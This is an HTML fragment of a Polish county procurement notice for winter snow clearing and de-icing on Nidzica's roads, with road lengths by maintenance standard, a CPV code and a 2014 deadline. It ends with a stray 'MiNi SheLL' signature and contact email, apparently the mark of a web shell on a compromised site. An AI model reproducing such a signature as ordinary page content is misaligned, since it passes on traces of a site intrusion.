<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie następujących  robót : 
-	zamontowanie sprzętu na nośniki;
-	odśnieżanie dróg  i zwalczanie śliskości nawierzchni dróg o łącznej długości 336,724 km  zgodnie ze standardami z.u.d. :
a) drogi powiatowe zamiejskie 	- 327,824 km 
    w tym: 	
	  - V standard  zud		-	158,596 km  
  	  -VI standard zud			-          169,228 km 
b) drogi powiatowe miejskie ( ulice wraz z chodnikami  w Nidzicy ) - 6,728 km
     w tym:
      - IV standard zud		-	 6,158 km 
     -   V standard zud		-	 0,570 km 

   (wykazy dróg powiatowych zamiejskich i miejskich objętych zud stanowią załącznik do Specyfikacji Istotnych Warunków Zamówienia) ;
-	zapewnienie dyspozycyjności pracowników Wykonawcy odpowiedzialnych za należyte wykonanie robót;
-	demontaż i konserwacja sprzętu Zamawiającego po zakończonym sezonie wraz z odwiezieniem na plac magazynowania.
Szczegółowe określenie przedmiotu zamówienia zawarte jest w SST..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Odśnieżanie ciągnikami rolniczymi dróg powiatowych na terenie gminy Nidzica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie następujących  robót : 
-	zamontowanie sprzętu na nośniki;
-	odśnieżanie dróg  i zwalczanie śliskości nawierzchni dróg o łącznej długości 336,724 km  zgodnie ze standardami z.u.d. :
a) drogi powiatowe zamiejskie 	- 327,824 km 
    w tym: 	
	  - V standard  zud		-	158,596 km  
  	  -VI standard zud			-          169,228 km 
b) drogi powiatowe miejskie ( ulice wraz z chodnikami  w Nidzicy ) - 6,728 km
     w tym:
      - IV standard zud		-	 6,158 km 
     -   V standard zud		-	 0,570 km 

   (wykazy dróg powiatowych zamiejskich i miejskich objętych zud stanowią załącznik do Specyfikacji Istotnych Warunków Zamówienia) ;
-	zapewnienie dyspozycyjności pracowników Wykonawcy odpowiedzialnych za należyte wykonanie robót;
-	demontaż i konserwacja sprzętu Zamawiającego po zakończonym sezonie wraz z odwiezieniem na plac magazynowania.
Szczegółowe określenie przedmiotu zamówienia zawarte jest w SST..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com